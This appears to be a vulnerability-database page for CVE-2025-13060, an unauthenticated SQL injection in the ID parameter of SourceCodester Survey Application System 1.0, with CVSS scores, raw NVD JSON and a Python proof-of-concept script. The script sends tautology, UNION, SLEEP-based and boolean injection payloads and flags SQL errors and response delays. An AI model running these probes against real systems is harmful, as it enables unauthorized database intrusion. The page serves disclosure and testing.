Security Vulnerability Report
CVE-2025-13060 CVSS 7.3 HIGH

CVE-2025-13060

Published: 2025-11-12 20:15:39
Last Modified: 2026-04-29 01:00:02

Description

A SQL injection vulnerability exists in SourceCodester Survey Application System 1.0, in an unspecified function of the file /view_survey.php: the value of the `ID` argument reaches a SQL query without adequate sanitization. The flaw is exploitable remotely and, per the CVSS vector (PR:N, UI:N), requires neither authentication nor user interaction. A public exploit has been disclosed and may already be in use.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Note: the 7.3 HIGH figure above is the VulDB (secondary) CVSS 3.1 assessment. NVD's primary CVSS 3.1 assessment in the raw JSON below rates the same issue CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, 9.8 CRITICAL, and the CVSS 4.0 vector scores it 5.5 MEDIUM. For prioritization, use the NVD primary (9.8 CRITICAL): an unauthenticated SQL injection is normally treated as a full database compromise.

Configurations (Affected Products)

cpe:2.3:a:oretnom23:survey_application_system:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester Survey Application System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Run it solely against systems you own or have written permission to test; it sends attacker-controlled SQL fragments to the target and will show up in server logs and IDS/WAF alerts.
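# CVE-2025-13060 SQL Injection PoC
# Target: SourceCodester Survey Application System 1.0
# File: /view_survey.php
# Parameter: ID
#
# Review notes (changes from the originally published PoC):
#   * The script no longer defaults to a real third-party host; the target
#     URL must be passed explicitly, so the PoC cannot be fired at someone
#     else's server by accident.
#   * The time-based payload is only meaningful if the round-trip time is
#     measured, so each request's elapsed time is printed and flagged.
#   * SQL-error detection no longer matches bare words like "error" or
#     "warning" (present on most pages); it looks for DBMS-specific
#     signatures instead.
import sys

# Placeholder only (RFC 2606 reserved TLD); the real target comes from argv.
target_url = "http://target.example/view_survey.php"

# Basic SQL Injection test payloads.  These are detection probes only
# (tautology, UNION column-count guess, time delay, boolean pair); none of
# them writes or deletes data.
payloads = [
    "1' OR '1'='1",                   # Tautology: different/more rows than id=1
    "1' UNION SELECT 1,2,3,4,5-- -",  # Union-based injection (column-count guess)
    "1' AND SLEEP(5)-- -",            # Time-based blind injection (MySQL)
    "1' AND 1=1-- -",                 # Boolean test (true)
    "1' AND 1=2-- -",                 # Boolean test (false)
]

# Delay requested by the SLEEP payload; a response taking at least this long
# is reported as a likely time-based injection.
SLEEP_SECONDS = 5

# Database error fragments, lower-cased.  The application is PHP/MySQL, so
# MySQL signatures dominate; a generic "sql syntax" catch-all is kept.
SQL_ERROR_SIGNATURES = (
    "you have an error in your sql syntax",
    "sql syntax",
    "mysql_fetch",
    "mysql_num_rows",
    "mysqli",
    "warning: mysql",
    "unclosed quotation mark",
)


def _looks_like_sql_error(body: str) -> bool:
    """Return True if *body* contains a database error signature.

    Matching is case-insensitive.  Only DBMS-specific fragments are used so
    a page that merely contains the word "error" is not reported.
    """
    lowered = body.lower()
    return any(sig in lowered for sig in SQL_ERROR_SIGNATURES)


def test_sql_injection(url: str, param: str = "id") -> None:
    """Send each probe payload in *param* to *url* and print what came back.

    For every payload the HTTP status, body length and elapsed time are
    printed.  A body matching a SQL error signature, or a response to the
    SLEEP payload slower than SLEEP_SECONDS, is flagged.  A timeout on the
    SLEEP payload alone (and not on the others) is also a strong hint.
    Results are indications only - manual verification is still required.

    Args:
        url: Full URL of the vulnerable page, e.g.
            ``http://host/view_survey.php``.
        param: Query-string parameter to inject into (``id`` for this CVE).
    """
    # Imported here so the module (and its pure helpers) loads even when the
    # third-party dependency is not installed.
    import requests

    print(f"[*] Testing SQL Injection on {url}")
    print(f"[*] Target parameter: {param}")

    for payload in payloads:
        try:
            response = requests.get(url, params={param: payload}, timeout=10)
        except requests.exceptions.RequestException as exc:
            # Name the payload: a timeout on SLEEP(5) only is itself diagnostic.
            print(f"[-] Request failed for payload {payload!r}: {exc}")
            continue

        elapsed = response.elapsed.total_seconds()
        print(f"\n[+] Payload: {payload}")
        print(f"    Status Code: {response.status_code}")
        print(f"    Response Length: {len(response.text)}")
        print(f"    Elapsed: {elapsed:.2f}s")

        if _looks_like_sql_error(response.text):
            print("    [!] Potential SQL error detected!")
        # Only the SLEEP payload is expected to stall; a slow response to it
        # (and not to the others) is the time-based signal.
        if "SLEEP(" in payload and elapsed >= SLEEP_SECONDS:
            print("    [!] Response delay matches SLEEP payload - likely time-based injection!")


# Not a unit test despite the name; stop pytest-style collectors picking it up.
test_sql_injection.__test__ = False


if __name__ == "__main__":
    # Refuse to run without an explicit target rather than probing a default host.
    if len(sys.argv) < 2:
        sys.exit(f"usage: {sys.argv[0]} http://<target>/view_survey.php")
    target_url = sys.argv[1]
    test_sql_injection(target_url)
    print("\n[*] PoC execution completed. Manual verification required.")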

References

Raw JSON Data

{"cve": {"id": "CVE-2025-13060", "sourceIdentifier": "[email protected]", "published": "2025-11-12T20:15:39.357", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in SourceCodester Survey Application System 1.0. This affects an unknown function of the file /view_survey.php. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:oretnom23:survey_application_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC838E1E-FAEC-4100-8364-41B7D342A010"}]}]}], "references": [{"url": "https://github.com/lakshayyverma/CVE-Discovery/blob/main/Survey%20Application%20System%202%20.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332187", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332187", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.682565", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/lakshayyverma/CVE-Discovery/blob/main/Survey%20Application%20System%202%20.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}